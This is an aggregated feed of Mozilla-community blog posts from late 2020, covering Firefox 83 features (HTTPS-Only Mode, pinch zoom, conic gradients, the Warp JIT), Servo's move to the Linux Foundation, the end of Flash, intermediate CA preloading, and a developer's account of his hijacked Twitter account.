To analyze the rate of network middlebox interference with DNSSEC records, we will send DNS responses to our telemetry system, rather than performing any analysis locally within the client’s browser. This will enable us to see the different ways that DNS responses are interfered with without relying on whatever analysis logic we bake into our experiment’s add-on. In order to protect user privacy, we will only send information for the domain names in the experiment that we control—not for any other domain names for which a client issues requests when browsing the web. Furthermore, we are not collecting UDP, TCP, or IP headers. We are only collecting the payload of the DNS response, for which we know the expected format. The data we are interested in should not include identifying information about a client, unless middleboxes inject such information when they interfere with DNS requests/responses.

We are launching the experiment today to 1% of Firefox Beta desktop clients and expect to publish our initial results around the end of the year.

The post Measuring Middlebox Interference with DNS Records appeared first on Mozilla Security Blog.

Hacks.Mozilla.OrgFoundations for the Future

Introduction

This week the Servo project took a significant next step in bringing community-led transformative innovations to the web by announcing it will be hosted by the Linux Foundation.  Mozilla is pleased to see Servo, which began as a research effort in 2012, open new doors that can lead it to ever broader benefits for users and the web. Working together, the Servo project and Linux Foundation are a natural fit for nurturing continued growth of the Servo community, encouraging investment in development, and expanding availability and adoption.

Historical Retrospective

From the outset the Servo project was about pioneering new approaches to web browsing fundamentals leveraging the extraordinary advantages of the Rust programming language, itself a companion Mozilla research effort. Rethinking the architecture and implementation of core browser operations allowed Servo to demonstrate extraordinary benefits from parallelism and direct leverage of our increasingly sophisticated computer and mobile phone hardware.

Those successes inspired the thinking behind Project Quantum, which in 2017 delivered compelling improvements in user responsiveness and performance for Firefox in large part by incorporating Servo’s parallelized styling engine (“Stylo”) along with other Rust-based components. More recently, Servo’s WebRender GPU-based rendering subsystem delivered new performance enhancements for Firefox, and Servo branched out to become an equally important component of Mozilla’s Firefox Reality virtual reality browser.

What’s Next?

All along the way, the Servo project has been an exemplary showcase for the benefits of open source based community contribution and leadership. Many other individuals and organizations contributed much of the implementation work that has found its way into Servo, Firefox, Firefox Reality, and indirectly the Rust programming language itself.

Mozilla is excited at what the future holds for Servo. Organizing and managing an effort at the scale and reach of Servo is no small thing, and the Linux Foundation is an ideal home with all the operational expertise and practical capabilities to help the project fully realize its potential. The term “graduate” somehow feels appropriate for this transition, and Mozilla could not be prouder or more enthusiastic.

For more information about the Servo project and to contribute, please visit servo.org.

 

The post Foundations for the Future appeared first on Mozilla Hacks - the Web developer blog.

About:CommunityWelcoming New Contributors: Firefox 83

With the release of Firefox 83, we are pleased to welcome all the developers who’ve contributed their first code change to Firefox in this release, 18 of whom are brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

Hacks.Mozilla.OrgFirefox 83 is upon us

Did November spawn a monster this year? In truth, November has given us a few snippets of good news, far from the least of which is the launch of Firefox 83! In this release we’ve got a few nice additions, including Conical CSS gradients, overflow debugging in the Developer Tools, enabling of WebRender across more platforms, and more besides.

This blog post provides merely a set of highlights; for all the details, check out the following:

DevTools

In the HTML Pane, scrollable elements have a “scroll” badge next to them, which you can now toggle to highlight elements causing an overflow (expanding nodes as needed to make them visible):

devtools page inspector showing a scroll badge next to an element that is scrolling

You will also see an “overflow” badge next to the node causing the overflow.

Firefox devtools screenshot showing an overflow badge next to a child element that is causing its parent to overflow

And in addition to that, if you hover over the node(s) causing the overflow, the UI will show a “ghost” of the content so you can see how far it overflows.

Firefox UI showing a highlighted paragraph and a ghost of the hidden overflow content

These new features are very useful for helping to debug problems related to overflow.

Web platform additions

Now let’s see what’s been added to Gecko in Firefox 83.

Conic gradients

We’ve had support for linear gradients and radial gradients in CSS images (e.g. in background-image) for a long time. Now in Firefox 83 we can finally add support for conic gradients to that list!

You can create a really simple conic gradient using two colors:

conic-gradient(red, orange);

simple conic gradient that goes from red to orange

But there are many options available. A more complex syntax example could look like so:

conic-gradient(
  from 45deg /* vary starting angle */
  at 30% 40%, /* vary position of gradient center */
  red, /* include multiple color stops */
  orange,
  yellow,
  green,
  blue,
  indigo 80%, /* vary angle of individual color stops */
  violet 90%
)

complex conic gradient showing all the colors of the rainbow, positioned off center

And in the same manner as the other gradient types, you can create repeating conic gradients:

repeating-conic-gradient(#ccc 20deg, #666 40deg)

repeating conic gradient that continually goes from dark gray to light gray

For more information and examples, check out our conic-gradient() reference page, and the Using CSS gradients guide.

WebRender comes to more platforms

We started work on our WebRender rendering architecture a number of years ago, with the aim of delivering the whole web at 60fps. This has already been enabled for Windows 10 users with suitable hardware, but today we bring the WebRender experience to Win7, Win8 and macOS 10.12 to 10.15 (not 10.16 beta as yet).

It’s an exciting time for Firefox performance — try it now, and let us know what you think!

Pinch to zoom on desktop

Last but not least, we’d like to draw your attention to pinch to zoom on desktop — this has long been requested, and finally we are in a position to enable pinch to zoom support for:

  • Windows laptop touchscreens
  • Windows laptop touchpads
  • macOS laptop touchpads

The post Firefox 83 is upon us appeared first on Mozilla Hacks - the Web developer blog.

Botond BalloDesktop pinch-zoom support arrives with Firefox 83

Today is the release date of Firefox 83. One of the new features in this release is support for pinch-zooming on desktop platforms, a feature whose development I was involved with and which I’ll describe briefly in this blog post.

Pinch gestures have long been the standard method of interaction to trigger zooming on mobile devices, and the mobile version of Firefox has supported them since (I believe) its inception.

The desktop version of Firefox has also had a zoom feature for a long time, activated via Ctrl+Plus/Minus or Ctrl+mousewheel or a button in the UI, but importantly, this performs a different type of zooming than pinch gestures on mobile, as I’ll illustrate.

The conventional method of zooming on desktop performs reflowing zoom, which looks like this:

By contrast, pinch gestures on mobile perform non-reflowing zoom, which looks like this:

While both methods of zooming increase the scale of text, images, and other content elements, reflowing zoom reflows the page such that the scaled-up content still fits into the same horizontal viewport width. This can cause text to be split up into lines differently, and more generally elements to change their position relative to each other. Non-reflowing zoom leaves the page layout alone and just scales the content, creating overflow in the horizontal direction that you need to scroll to bring into view.

Non-reflowing zoom has some important advantages over reflowing zoom:

  • Reflow is expensive, making non-reflowing zoom much faster and more responsive.
  • Non-reflowing zoom is more predictable in the sense that the content at the pinch gesture’s “focus point” will remain stationary, so you can zoom in “on an element” more accurately.

The non-reflowing behaviour can also be a downside: if it’s a paragraph of text you’re zooming in on, if you zoom to a point where the lines are wider than the screen, you have to scroll horizontally to read a whole line.

Basically, reflowing and non-reflowing zoom lend themselves to different use cases. Reflowing zoom is useful if, say, you’re reading an article but the text is a bit small for comfort (though I’ll take the opportunity to plug Firefox’s Reader View as an even better option for this case). Non-reflowing zoom is useful if, say, you want to zoom in on an image or diagram to get a closer look at it.

Firefox users have long asked for the ability to trigger non-reflowing zoom on desktop platforms, using pinch gestures on a touchscreen or touchpad, a feature that other browsers have introduced over time as well. Firefox 83 finally fulfils this request, for touchscreens on all platforms, and touchpads on Windows and Mac. (Linux touchpads are still a work in progress.)

Reflowing zoom hasn’t gone away, it’s still activated using the same means as before (Ctrl+mousewheel etc.).

I’d like to extend a big thank you to my colleagues Kartikaya Gupta, Timothy Nikkel, and Kris Taeleman, with whom I collaborated on this feature, among many others who lent a helping hand.

Implementing this feature was trickier than it sounds. Without getting into too many details, some of the main sources of complexity were:

  • Scrollbars, particularly given that on desktop platforms you can interact with them (i.e. click them / drag them). I think our implementation here ended up being more complete than Chrome’s, in that scrollbars remain fully interactive even when zoomed.
  • Web pages that want to handle pinch gestures themselves and “do their own thing”, such as Google Maps. Careful coordination is required to determine whether the pinch gesture should be handled by the page, or by the browser.

If you’re a Firefox user with a touchscreen or a touchpad, I encourage you to give the new zoom feature a try! If you’re not a Firefox user, I encourage you to try Firefox 🙂 If you run into any issues, bug reports are appreciated.

Mozilla Future Releases BlogEnding Firefox support for Flash

On January 26, 2021, Firefox will end support for Adobe Flash, as announced back in 2017. Adobe and other browsers will also end support for Flash in January and we are working together to ensure a smooth transition for all.

Firefox version 84 will be the final version to support Flash. On January 26, 2021 when we release Firefox version 85, it will ship without Flash support, improving our performance and security. For our users on Nightly and Beta release channels, Flash support will end on November 17, 2020 and December 14, 2020 respectively. There will be no setting to re-enable Flash support.

The Adobe Flash plugin will stop loading Flash content after January 12, 2021. See Adobe’s Flash Player End of Life information page for more details.

The post Ending Firefox support for Flash appeared first on Future Releases.

Mozilla Security BlogFirefox 83 introduces HTTPS-Only Mode

 

Security on the web matters. Whenever you connect to a web page and enter a password, a credit card number, or other sensitive information, you want to be sure that this information is kept secure. Whether you are writing a personal email or reading a page on a medical condition, you don’t want that information leaked to eavesdroppers on the network who have no business prying into your personal communications.

That’s why Mozilla is pleased to introduce HTTPS-Only Mode, a brand-new security feature available in Firefox 83. When you enable HTTPS-Only Mode:

  • Firefox attempts to establish fully secure connections to every website, and
  • Firefox asks for your permission before connecting to a website that doesn’t support secure connections.

 

How HTTPS-Only Mode works

The Hypertext Transfer Protocol (HTTP) is a fundamental protocol through which web browsers and websites communicate. However, data transferred by the regular HTTP protocol is unprotected and transferred in cleartext, such that attackers are able to view, steal, or even tamper with the transmitted data. HTTP over TLS (HTTPS) fixes this security shortcoming by creating a secure and encrypted connection between your browser and the website you’re visiting. You know a website is using HTTPS when you see the lock icon in the address bar:

The majority of websites already support HTTPS, and those that don’t are increasingly uncommon. Regrettably, websites often fall back to using the insecure and outdated HTTP protocol. Additionally, the web contains millions of legacy HTTP links that point to insecure versions of websites. When you click on such a link, browsers traditionally connect to the website using the insecure HTTP protocol.

In light of the very high availability of HTTPS, we believe that it is time to let our users choose to always use HTTPS. That’s why we have created HTTPS-Only Mode, which ensures that Firefox doesn’t make any insecure connections without your permission. When you enable HTTPS-Only Mode, Firefox tries to establish a fully secure connection to the website you are visiting.

Whether you click on an HTTP link, or you manually enter an HTTP address, Firefox will use HTTPS instead. Here’s what that upgrade looks like:

 

How to turn on HTTPS-Only Mode

If you are eager to try this new security enhancing feature, enabling HTTPS-Only Mode is simple:

  1. Click on Firefox’s menu button and choose “Preferences”.
  2. Select “Privacy & Security” and scroll down to the section “HTTPS-Only Mode”.
  3. Choose “Enable HTTPS-Only Mode in all windows”.

Once HTTPS-Only Mode is turned on, you can browse the web as you always do, with confidence that Firefox will upgrade web connections to be secure whenever possible, and keep you safe by default. For the small number of websites that don’t yet support HTTPS, Firefox will display an error message that explains the security risk and asks you whether or not you want to connect to the website using HTTP. Here’s what the error message looks like:

It also can happen, rarely, that a website itself is available over HTTPS but resources within the website, such as images or videos, are not available over HTTPS. Consequently, some web pages may not look right or might malfunction. In that case, you can temporarily disable HTTPS-Only Mode for that site by clicking the lock icon in the address bar:

The HTTPS-Only Mode options are "On", "Off", and "Off temporarily"

The future of the web is HTTPS-Only

Once HTTPS becomes even more widely supported by websites than it is today, we expect it will be possible for web browsers to deprecate HTTP connections and require HTTPS for all websites. In summary, HTTPS-Only Mode is the future of web browsing!

Thank You

We are grateful to many Mozillians for making HTTPS-Only Mode possible, including but not limited to the work of Meridel Walkington, Eric Pang, Martin Thomson, Steven Englehardt, Alice Fleischmann, Angela Lazar, Mikal Lewis, Wennie Leung, Frederik Braun, Tom Ritter, June Wilde, Sebastian Streich, Daniel Veditz, Prangya Basu, Dragana Damjanovic, Valentin Gosu, Chris Lonnen, Andrew Overholt, and Selena Deckelmann. We also want to acknowledge the work of our friends at the EFF, who pioneered a similar approach in HTTPS Everywhere’s EASE Mode. It’s a privilege to work with people who are passionate about building the web we want: free, independent and secure.

 

The post Firefox 83 introduces HTTPS-Only Mode appeared first on Mozilla Security Blog.

The Servo BlogServo’s new home

The Servo Project is excited to announce that it has found a new home with the Linux Foundation. Servo was incubated inside Mozilla, and served as the proof that important web components such as CSS and rendering could be implemented in Rust, with all its safety, concurrency and speed. Now it’s time for Servo to leave the nest!

This move comes with a change in project governance: the Servo Project gains a board and a technical steering committee to help guide the project’s future (see github.com/servo/project/ for more details).

Servo’s high-level goals remain unchanged: to provide a high-performance, safe rendering engine for embedding in other applications. It is the responsibility of the technical steering committee to provide direction for these goals and enable the wider Servo community to make meaningful contributions that advance this mission.

As a result of these changes, it is now easier than ever before to contribute to Servo’s future. Whether by writing code or documentation, testing nightlies and filing issues, or donating to help cover the project’s new CI and hosting costs, every bit helps. If you know a company that would like to support the Servo Project, please get in touch as we will be rolling out a formal membership program to support the future of the project.

We also have a new home for discussions, help and general conversation, at the Servo Zulip. We hope to see you there, and look forward to building the future of embeddable web rendering engines with you in our new home!

Daniel StenbergI lost my twitter account

tldr: it’s back now!

At 00:42 in the early morning of November 16 (my time, Central European Time), I received an email saying that “someone” logged into my twitter account @bagder from a new device. The email said it was done from Stockholm, Sweden and it was “Chrome on Windows”. (I live Stockholm)

I didn’t do it. I don’t normally use Windows and I typically don’t run Chrome. I didn’t react immediately on the email however, as I was debugging curl code at the moment it arrived. Just a few moments later I was forcibly logged out from my twitter sessions (using tweetdeck in my Firefox on Linux and on my phone).

Whoa! What was that? I tried to login again in the browser tab, but Twitter claimed my password was invalid. Huh? Did I perhaps have the wrong password? I selected “restore my password” and then learned that Twitter doesn’t even know about my email anymore (in spite of having emailed me on it just minutes ago).

At 00:50 I reported the issue to Twitter. At 00:51 I replied to their confirmation email and provided them with additional information, such as my phone number I have (had?) associated with my account.

I’ve since followed up with two additional emails to Twitter with further details about this but I have yet to hear something from them. I cannot access my account.

November 17: (30 hours since it happened). The name of my account changed to Elon Musk (with a few funny unicode letters that only look similar to the Latin letters) and pushed for bitcoin scams.

Also mentioned on hacker news and reddit.

At 20:56 on November 17 I received the email with the notice the account had been restored back to my email address and ownership.

Left now are the very sad DM responses in my account from desperate and ruined people who cry out for help and mercy from the scammers after they’ve fallen for the scam and lost large sums of money.

How?

A lot of people ask me how this was done. The simple answer is that I don’t know. At. All. Maybe I will later on but right now, it all went down as described above and it does not tell how the attacker managed to perform this. Maybe I messed up somewhere? I don’t know and I refuse to speculate without having more information.

I’m convinced I had 2fa enabled on the account, but I’m starting to doubt if perhaps I am mistaking myself?

Why me?

Probably because I have a “verified” account (with a blue check-mark) with almost 24.000 followers.

Other accounts

I have not found any attacks, take-overs or breaches in any other online accounts and I have no traces of anyone attacking my local computer or other accounts of mine with value. I don’t see any reason to be alarmed to suspect that source code or github project I’m involved with should be “in danger”.

Credits

Image by Jill Wellington from Pixabay

Cameron KaiserRosetta 2: This Time It's Personal (and busting an old Rosetta myth)

Apple's back in the RISC camp, though I still hate the name Apple Silicon, as if Apple has some special sauce for certain inorganic elements that makes it any better than any other kind of silicon. With the release of the M1 ("merely" an A14 on steroids by all accounts) a series of benchmarks have been turning up on Geekbench, which because I'm such a big conspiracy theorist I suspect are probably being astroturfed out of Infinite Loop itself. One that particularly attracted my attention, however, is this one which shows Rosetta 2 (the x86_64-on-AARM emulator analogous to the Rosetta PPC-on-Intel emulator in 10.4-10.6) exceeding the single-core performance of Apple's other Intel machines on Intel apps. The revenge-of-the-G5 Mac Pro is conspicuously absent (for the record a cursory search on the 2019 model yields scores from around 1024 to 1116 depending on configuration), but M1 still eclipses it and even edges past the i9 in the current 27" iMac.

That's pretty stupendous, so I'd like to take a moment to once again destroy my least favourite zombie performance myth, that the original Rosetta was faster at running PowerPC apps than PowerPC Macs. This gets endlessly repeated as justification for the 2005 Intel transition and it's false.

We even have some surviving benchmarks from the time. Bare Feats did a series of comparisons of the Mac Pro 2.66, 3.0 and the Quad G5 running various Adobe pro applications, which at the time were only available as PowerPC and had to run in Rosetta. The Mac Pros were clearly faster at Universal binaries with native Intel code, but not only did the Quad G5 consistently beat the 2.66GHz Mac Pro on the tested PowerPC-only apps, it even got by the 3.0GHz at least once, and another particular shootout was even more lopsided. The situation was only marginally better for the laptop side, where, despite a 20% faster clock speed, the MacBook Pro Core Duo 2.0GHz only beat the last and fastest DLSD G4/1.67GHz in one benchmark (and couldn't beat a 2.0GHz G5 at all). Clock-for-clock, the Power Macs were still overall faster on their own apps than the first Intel Macs and it wasn't until native Intel code was available that the new generation became the obvious winner. There may have been many good reasons for Apple making the jump but this particular reason wasn't one of them.

And this mirrors the situation with early Power Macs during the 68K-PPC transition where the first iterations of the built-in 68K emulator were somewhat underwhelming, especially on the 603 which didn't have enough cache for the task until the 603e. The new Power Macs really kicked butt on native code but it took the combination of beefier chips and a better recompiling 68K emulator to comfortably exceed the '040s in 68K app performance.

If the Rosetta 2 benchmarks for the M1 are to be believed, this would be the first time Apple's new architecture indisputably exceeded its old one even on the old architecture's own turf. I don't know if that's enough to make me buy one given Apple's continued lockdown (cough) trajectory, but it's enough to at least make me watch the M1's progress closely.

Chris IliasClippings for Thunderbird replacement: Quicktext

I was a long time user of Clippings in Thunderbird. I used it for canned responses in the support newsgroups and more. Now that the Clippings is not being updated for Thunderbird 78, it’s time to look for a replacement.

I found a great replacement, called Quicktext.

With Quicktext, I create a TXT file for each response and put them in a designated directory. Quicktext has the option to paste from a TXT file or an HTML file. When composing a message, there are two buttons to the far-right above the text area.

To paste text from a local file, click Other, then choose either Insert file as Text or Insert file as HTML.

Additionally, you can click Variable, and paste items click the sender or recipient’s name, attachment name and size, dates, and more.

I’ve found Quicktext to be more versatile than Clippings, and have been very happy with it. You can download it from addons.thunderbird.net.

Cameron KaiserTenFourFox FPR29 available

TenFourFox Feature Parity Release 29 final is now available for testing (downloads, hashes, release notes). There are no additional changes from the beta except for outstanding security patches. Locale langpacks will accompany this release and should be available simultaneously on or about Monday or Tuesday (November 17 or 18) parallel to mainline Firefox.

Because of the holidays and my work schedule I'm evaluating what might land in the next release and it may be simply a routine security update only to give me some time to catch up on other things. This release would come out on or about December 15 and I would probably not have a beta unless the changes were significant. More as I make a determination.

Robert O'Callahanrr Repository Moved To Independent Organisation

For a long time, rr has not been a Mozilla project in practice, so we have worked with Mozilla to move it to an independent Github organization. The repository is now at https://github.com/rr-debugger/rr. Update your git remotes!

This gives us a bit more operational flexibility for the future because we don't need Mozilla to assist in making certain kinds of Github changes.

There have been no changes in intellectual property ownership. rr contributions made by Mozilla employees and contractors remain copyrighted by Mozilla. I will always be extremely grateful for the investment Mozilla made to create rr!

For now, the owners of the rr-debugger organisation will be me (Robert O'Callahan), Kyle Huey, and Keno Fischer (of Julia fame, who has been a prolific contributor to rr).

Mozilla Security BlogPreloading Intermediate CA Certificates into Firefox

Throughout 2020, Firefox users have been seeing fewer secure connection errors while browsing the Web. We’ve been improving connection errors overall for some time, and a new feature called Intermediate Certificate Authority (CA) Preloading is our latest innovation. This technique reduces connection errors that users encounter when web servers forget to properly configure their TLS security.

In essence, Firefox pre-downloads all trusted Web Public Key Infrastructure (PKI) intermediate CA certificates into Firefox via Mozilla’s Remote Settings infrastructure. This way, Firefox users avoid seeing an error page for one of the most common server configuration problems: not specifying proper intermediate CA certificates.

For Intermediate CA Preloading to work, we need to be able to enumerate every intermediate CA certificate that is part of the trusted Web PKI. As a result of Mozilla’s leadership in the CA community, each CA in Mozilla’s Root Store Policy is required to disclose these intermediate CA certificates to the multi-browser Common CA Database (CCADB). Consequently, all of the relevant intermediate CA certificates are available via the CCADB reporting mechanisms. Given this information, we periodically synthesize a list of these intermediate CA certificates and place them into Remote Settings. Currently the list contains over two thousand entries.

When Firefox receives the list for the first time (or later receives updates to the list), it enumerates the entries in batches and downloads the corresponding intermediate CA certificates in the background. The list changes slowly, so once a copy of Firefox has completed the initial downloads, it’s easy to keep it up-to-date. The list can be examined directly using your favorite JSON tooling at this URL: https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/intermediates/records

For details on processing the records, see the Kinto Attachment plugin for Kinto, used by Firefox Remote Settings.

Certificates provided via Intermediate CA Preloading are added to a local cache and are not imbued with trust. Trust is still derived from the standard Web PKI algorithms.

Our collected telemetry confirms that enabling Intermediate CA Preloading in Firefox 68 has led to a decrease of unknown issuers errors in the TLS Handshake.

unknown issuer errors declining after Firefox Beta 68

While there are other factors that affect the relative prevalence of this error, this data supports the conclusion that Intermediate CA Preloading is achieving the goal of avoiding these connection errors for Firefox users.

Intermediate CA Preloading is reducing errors today in Firefox for desktop users, and we’ll be working to roll it out to our mobile users in the future.

The post Preloading Intermediate CA Certificates into Firefox appeared first on Mozilla Security Blog.

Daniel Stenbergthere is always a CURLOPT for it

Embroidered and put on the kitchen wall, on a mug or just as words of wisdom to bring with you in life?

Hacks.Mozilla.OrgWarp: Improved JS performance in Firefox 83

Introduction

We have enabled Warp, a significant update to SpiderMonkey, by default in Firefox 83. SpiderMonkey is the JavaScript engine used in the Firefox web browser.

With Warp (also called WarpBuilder) we’re making big changes to our JIT (just-in-time) compilers, resulting in improved responsiveness, faster page loads and better memory usage. The new architecture is also more maintainable and unlocks additional SpiderMonkey improvements.

This post explains how Warp works and how it made SpiderMonkey faster.

How Warp works

Multiple JITs

The first step when running JavaScript is to parse the source code into bytecode, a lower-level representation. Bytecode can be executed immediately using an interpreter or can be compiled to native code by a just-in-time (JIT) compiler. Modern JavaScript engines have multiple tiered execution engines.

JS functions may switch between tiers depending on the expected benefit of switching:

  • Interpreters and baseline JITs have fast compilation times, perform only basic code optimizations (typically based on Inline Caches), and collect profiling data.
  • The Optimizing JIT performs advanced compiler optimizations but has slower compilation times and uses more memory, so is only used for functions that are warm (called many times).

The optimizing JIT makes assumptions based on the profiling data collected by the other tiers. If these assumptions turn out to be wrong, the optimized code is discarded. When this happens the function resumes execution in the baseline tiers and has to warm-up again (this is called a bailout).

For SpiderMonkey it looks like this (simplified):Baseline Interpreter/JIT, after warmup Ion/Warp JIT. Bailout arrow from Ion/Warp back to Baseline.

Profiling data

Our previous optimizing JIT, Ion, used two very different systems for gathering profiling information to guide JIT optimizations. The first is Type Inference (TI), which collects global information about the types of objects used in the JS code. The second is CacheIR, a simple linear bytecode format used by the Baseline Interpreter and the Baseline JIT as the fundamental optimization primitive. Ion mostly relied on TI, but occasionally used CacheIR information when TI data was unavailable.

With Warp, we’ve changed our optimizing JIT to rely solely on CacheIR data collected by the baseline tiers. Here’s what this looks like:
overview of profiling data as described in the text

There’s a lot of information here, but the thing to note is that we’ve replaced the IonBuilder frontend (outlined in red) with the simpler WarpBuilder frontend (outlined in green). IonBuilder and WarpBuilder both produce Ion MIR, an intermediate representation used by the optimizing JIT backend.

Where IonBuilder used TI data gathered from the whole engine to generate MIR, WarpBuilder generates MIR using the same CacheIR that the Baseline Interpreter and Baseline JIT use to generate Inline Caches (ICs). As we’ll see below, the tighter integration between Warp and the lower tiers has several advantages.

How CacheIR works

Consider the following JS function:

function f(o) {
    return o.x - 1;
}

The Baseline Interpreter and Baseline JIT use two Inline Caches for this function: one for the property access (o.x), and one for the subtraction. That’s because we can’t optimize this function without knowing the types of o and o.x.

The IC for the property access, o.x, will be invoked with the value of o. It can then attach an IC stub (a small piece of machine code) to optimize this operation. In SpiderMonkey this works by first generating CacheIR (a simple linear bytecode format, you could think of it as an optimization recipe). For example, if o is an object and x is a simple data property, we generate this:

GuardToObject        inputId 0
GuardShape           objId 0, shapeOffset 0
LoadFixedSlotResult  objId 0, offsetOffset 8
ReturnFromIC

Here we first guard the input (o) is an object, then we guard on the object’s shape (which determines the object’s properties and layout), and then we load the value of o.x from the object’s slots.

Note that the shape and the property’s index in the slots array are stored in a separate data section, not baked into the CacheIR or IC code itself. The CacheIR refers to the offsets of these fields with shapeOffset and offsetOffset. This allows many different IC stubs to share the same generated code, reducing compilation overhead.

The IC then compiles this CacheIR snippet to machine code. Now, the Baseline Interpreter and Baseline JIT can execute this operation quickly without calling into C++ code.

The subtraction IC works the same way. If o.x is an int32 value, the subtraction IC will be invoked with two int32 values and the IC will generate the following CacheIR to optimize that case:

GuardToInt32     inputId 0
GuardToInt32     inputId 1
Int32SubResult   lhsId 0, rhsId 1
ReturnFromIC

This means we first guard the left-hand side is an int32 value, then we guard the right-hand side is an int32 value, and we can then perform the int32 subtraction and return the result from the IC stub to the function.

The CacheIR instructions capture everything we need to do to optimize an operation. We have a few hundred CacheIR instructions, defined in a YAML file. These are the building blocks for our JIT optimization pipeline.

Warp: Transpiling CacheIR to MIR

If a JS function gets called many times, we want to compile it with the optimizing compiler. With Warp there are three steps:

  1. WarpOracle: runs on the main thread, creates a snapshot that includes the Baseline CacheIR data.
  2. WarpBuilder: runs off-thread, builds MIR from the snapshot.
  3. Optimizing JIT Backend: also runs off-thread, optimizes the MIR and generates machine code.

The WarpOracle phase runs on the main thread and is very fast. The actual MIR building can be done on a background thread. This is an improvement over IonBuilder, where we had to do MIR building on the main thread because it relied on a lot of global data structures for Type Inference.

WarpBuilder has a transpiler to transpile CacheIR to MIR. This is a very mechanical process: for each CacheIR instruction, it just generates the corresponding MIR instruction(s).

Putting this all together we get the following picture (click for a larger version):

We’re very excited about this design: when we make changes to the CacheIR instructions, it automatically affects all of our JIT tiers (see the blue arrows in the picture above). Warp is simply weaving together the function’s bytecode and CacheIR instructions into a single MIR graph.

Our old MIR builder (IonBuilder) had a lot of complicated code that we don’t need in WarpBuilder because all the JS semantics are captured by the CacheIR data we also need for ICs.

Trial Inlining: type specializing inlined functions

Optimizing JavaScript JITs are able to inline JavaScript functions into the caller. With Warp we are taking this a step further: Warp is also able to specialize inlined functions based on the call site.

Consider our example function again:

function f(o) {
    return o.x - 1;
}

This function may be called from multiple places, each passing a different shape of object or different types for o.x. In this case, the inline caches will have polymorphic CacheIR IC stubs, even if each of the callers only passes a single type. If we inline the function in Warp, we won’t be able to optimize it as well as we want.

To solve this problem, we introduced a novel optimization called Trial Inlining. Every function has an ICScript, which stores the CacheIR and IC data for that function. Before we Warp-compile a function, we scan the Baseline ICs in that function to search for calls to inlinable functions. For each inlinable call site, we create a new ICScript for the callee function. Whenever we call the inlining candidate, instead of using the default ICScript for the callee, we pass in the new specialized ICScript. This means that the Baseline Interpreter, Baseline JIT, and Warp will now collect and use information specialized for that call site.

Trial inlining is very powerful because it works recursively. For example, consider the following JS code:

function callWithArg(fun, x) {
    return fun(x);
}
function test(a) {
    var b = callWithArg(x => x + 1, a);
    var c = callWithArg(x => x - 1, a);
    return b + c;
}

When we perform trial inlining for the test function, we will generate a specialized ICScript for each of the callWithArg calls. Later on, we attempt recursive trial inlining in those caller-specialized callWithArg functions, and we can then specialize the fun call based on the caller. This was not possible in IonBuilder.

When it’s time to Warp-compile the test function, we have the caller-specialized CacheIR data and can generate optimal code.

This means we build up the inlining graph before functions are Warp-compiled, by (recursively) specializing Baseline IC data at call sites. Warp then just inlines based on that without needing its own inlining heuristics.

Optimizing built-in functions

IonBuilder was able to inline certain built-in functions directly. This is especially useful for things like Math.abs and Array.prototype.push, because we can implement them with a few machine instructions and that’s a lot faster than calling the function.

Because Warp is driven by CacheIR, we decided to generate optimized CacheIR for calls to these functions.

This means these built-ins are now also properly optimized with IC stubs in our Baseline Interpreter and JIT. The new design leads us to generate the right CacheIR instructions, which then benefits not just Warp but all of our JIT tiers.

For example, let’s look at a Math.pow call with two int32 arguments. We generate the following CacheIR:

LoadArgumentFixedSlot      resultId 1, slotIndex 3
GuardToObject              inputId 1
GuardSpecificFunction      funId 1, expectedOffset 0, nargsAndFlagsOffset 8
LoadArgumentFixedSlot      resultId 2, slotIndex 1
LoadArgumentFixedSlot      resultId 3, slotIndex 0
GuardToInt32               inputId 2
GuardToInt32               inputId 3
Int32PowResult             lhsId 2, rhsId 3
ReturnFromIC

First, we guard that the callee is the built-in pow function. Then we load the two arguments and guard they are int32 values. Then we perform the pow operation specialized for two int32 arguments and return the result of that from the IC stub.

Furthermore, the Int32PowResult CacheIR instruction is also used to optimize the JS exponentiation operator, x ** y. For that operator we might generate:

GuardToInt32               inputId 0
GuardToInt32               inputId 1
Int32PowResult             lhsId 0, rhsId 1
ReturnFromIC

When we added Warp transpiler support for Int32PowResult, Warp was able to optimize both the exponentiation operator and Math.pow without additional changes. This is a nice example of CacheIR providing building blocks that can be used for optimizing different operations.

Results

Performance

Warp is faster than Ion on many workloads. The picture below shows a couple examples: we had a 20% improvement on Google Docs load time, and we are about 10-12% faster on the Speedometer benchmark:
20% faster on GDocs, 10-12% faster on Speedometer

We’ve seen similar page load and responsiveness improvements on other JS-intensive websites such as Reddit and Netflix. Feedback from Nightly users has been positive as well.

The improvements are largely because basing Warp on CacheIR lets us remove the code throughout the engine that was required to track the global type inference data used by IonBuilder, resulting in speedups across the engine.

The old system required all functions to track type information that was only useful in very hot functions. With Warp, the profiling information (CacheIR) used to optimize Warp is also used to speed up code running in the Baseline Interpreter and Baseline JIT.

Warp is also able to do more work off-thread and requires fewer recompilations (the previous design often overspecialized, resulting in many bailouts).

Synthetic JS benchmarks

Warp is currently slower than Ion on certain synthetic JS benchmarks such as Octane and Kraken. This isn’t too surprising because Warp has to compete with almost a decade of optimization work and tuning for those benchmarks specifically.

We believe these benchmarks are not representative of modern JS code (see also the V8 team’s blog post on this) and the regressions are outweighed by the large speedups and other improvements elsewhere.

That said, we will continue to optimize Warp the coming months and we expect to see improvements on all of these workloads going forward.

Memory usage

Removing the global type inference data also means we use less memory. For example the picture below shows JS code in Firefox uses 8% less memory when loading a number of websites (tp6):
8% less memory on the tp6 suite

We expect this number to improve the coming months as we remove the old code and are able to simplify more data structures.

Faster GCs

The type inference data also added a lot of overhead to garbage collection. We noticed some big improvements in our telemetry data for GC sweeping (one of the phases of our GC) when we enabled Warp by default in Firefox Nightly on September 23:
Drop in GC-sweeping times when warp landed, for example mean around 30 to around 20 ms

Maintainability and Developer Velocity

Because WarpBuilder is a lot more mechanical than IonBuilder, we’ve found the code to be much simpler, more compact, more maintainable and less error-prone. By using CacheIR everywhere, we can add new optimizations with much less code. This makes it easier for the team to improve performance and implement new features.

What’s next?

With Warp we have replaced the frontend (the MIR building phase) of the IonMonkey JIT. The next step is removing the old code and architecture. This will likely happen in Firefox 85. We expect additional performance and memory usage improvements from that.

We will also continue to incrementally simplify and optimize the backend of the IonMonkey JIT. We believe there’s still a lot of room for improvement for JS-intensive workloads.

Finally, because all of our JITs are now based on CacheIR data, we are working on a tool to let us (and web developers) explore the CacheIR data for a JS function. We hope this will help developers understand JS performance better.

Acknowledgements

